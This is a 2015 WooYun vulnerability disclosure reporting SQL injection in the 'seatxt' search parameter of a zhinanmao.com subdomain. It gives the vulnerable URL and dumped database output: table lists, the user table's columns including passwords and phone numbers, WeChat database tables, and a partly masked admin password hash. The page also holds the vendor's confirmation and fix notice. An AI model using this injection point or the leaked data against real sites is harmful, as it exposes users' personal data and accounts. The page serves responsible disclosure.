当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136827

漏洞标题:指南猫某站SQL注入漏洞(整站数据全站用户信息告急)

相关厂商:zhinanmao.com

漏洞作者: M4sk

提交时间:2015-08-26 15:05

修复时间:2015-10-10 18:36

公开时间:2015-10-10 18:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

RT

详细说明:

http://v1.zhinanmao.com/?r=search%2Fsearch&seatxt=11&search_class=1
seatxt=参数问题



mask 区域


*****atabas*****
*****tion_s*****
*****ysq*****
*****ance_s*****
*****nm_*****
*****_db_*****
*****_wei*****
**********
**********
*****e: z*****
*****abl*****
*****--------*****
*****commend *****
*****        *****
*****class   *****
*****cklist  *****
*****        *****
*****u       *****
*****r       *****
*****        *****
*****        *****
*****        *****
*****ule     *****
*****source  *****
*****        *****
*****ly      *****
*****ly_pictu*****
*****ation   *****
*****s       *****
*****itor    *****
*****n       *****
*****        *****
*****        *****
*****        *****
*****ist     *****
*****        *****
*****        *****
*****list    *****
*****        *****
*****        *****
*****        *****
*****og      *****
*****upport  *****
*****        *****
*****1126    *****
*****end     *****
*****        *****
*****        *****
*****        *****
*****m       *****
*****        *****
*****        *****
*****        *****
*****lass    *****
*****        *****
*****        *****
*****        *****
*****0131126 *****
*****del     *****
*****edit    *****
*****property*****
*****property*****
*****        *****
*****it      *****
*****        *****
*****        *****
*****        *****
*****um      *****
*****um_user *****
*****om      *****
*****y       *****
*****y_resour*****
*****l       *****
*****s       *****
*****e       *****
*****e       *****
*****urce    *****
*****ch      *****
*****        *****
*****        *****
*****ass     *****
*****stom    *****
*****        *****
*****e       *****
*****        *****
*****        *****
*****ection  *****
*****l       *****
*****back    *****
*****ow      *****
*****r       *****
*****te      *****
*****l       *****
*****        *****
*****age     *****
*****e       *****
*****form    *****
*****ip      *****
*****tor     *****
*****s       *****







+-------------------------------+


Database: znm_db
Table: znm_user
[50 columns]
+-------------------------+----------------------+
| Column                  | Type                 |
+-------------------------+----------------------+
| create_time             | int(10) unsigned     |
| invite_uid              | int(10) unsigned     |
| update_time             | int(10) unsigned     |
| user_authy              | char(10)             |
| user_birth_day          | int(10) unsigned     |
| user_birth_month        | int(10) unsigned     |
| user_birth_type         | int(10) unsigned     |
| user_birth_year         | int(10) unsigned     |
| user_city               | int(10) unsigned     |
| user_country            | int(10) unsigned     |
| user_credits            | int(10) unsigned     |
| user_diary_total        | int(10) unsigned     |
| user_email              | char(30)             |
| user_email_auth         | tinyint(3) unsigned  |
| user_fans_total         | int(10) unsigned     |
| user_faver_total        | int(10) unsigned     |
| user_focus_total        | int(10) unsigned     |
| user_fund_total         | int(10) unsigned     |
| user_gone_city_total    | int(10) unsigned     |
| user_gone_country_total | int(10) unsigned     |
| user_gone_total         | int(10) unsigned     |
| user_home_city          | int(10) unsigned     |
| user_home_country       | int(10) unsigned     |
| user_home_prov          | int(10) unsigned     |
| user_icon               | char(20)             |
| user_id                 | bigint(20)           |
| user_level              | int(2)               |
| user_login_ip           | char(16)             |
| user_login_last         | int(10) unsigned     |
| user_login_status       | smallint(3) unsigned |
| user_login_total        | int(10) unsigned     |
| user_mobile             | char(15)             |
| user_money              | int(10) unsigned     |
| user_name               | varchar(32)          |
| user_nickname           | varchar(32)          |
| user_password           | varchar(32)          |
| user_plan_total         | int(10) unsigned     |
| user_private            | tinyint(3) unsigned  |
| user_private_msg_total  | int(10) unsigned     |
| user_prov               | int(10) unsigned     |
| user_qq                 | char(12)             |
| user_question_total     | int(10) unsigned     |
| user_realname           | varchar(30)          |
| user_reg_ip             | char(16)             |
| user_reply_msg_total    | int(10) unsigned     |
| user_sex                | smallint(1)          |
| user_sex_private        | tinyint(3) unsigned  |
| user_sys_msg_total      | int(10) unsigned     |
| user_travel_faver       | tinyint(2)           |
| user_wanna_total        | int(10) unsigned     |
+-------------------------+----------------------+


用户账号密码都在上面了~ 你懂得了~
还有微信的

Database: znm_weixin
[5 tables]
+-------------------+
| znm_weixin_admin  |
| znm_weixin_group  |
| znm_weixin_msg    |
| znm_weixin_unread |
| znm_weixin_user   |
+-------------------+


不小厂商吧~ 整站数据库都在这

1.png


admin / 9b6db97******2137c2143049 (******)
前台吧~

漏洞证明:

综上

修复方案:

过滤

版权声明:转载请注明来源 M4sk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-26 18:35

厂商回复:

感谢白帽子 M4sk 给我们敲响安全警钟!指南猫已意识到安全的重要性,正在紧急修复。

最新状态:

2015-08-29:已在第一时间紧急修改,并加强了安全措施,感谢 @M4sk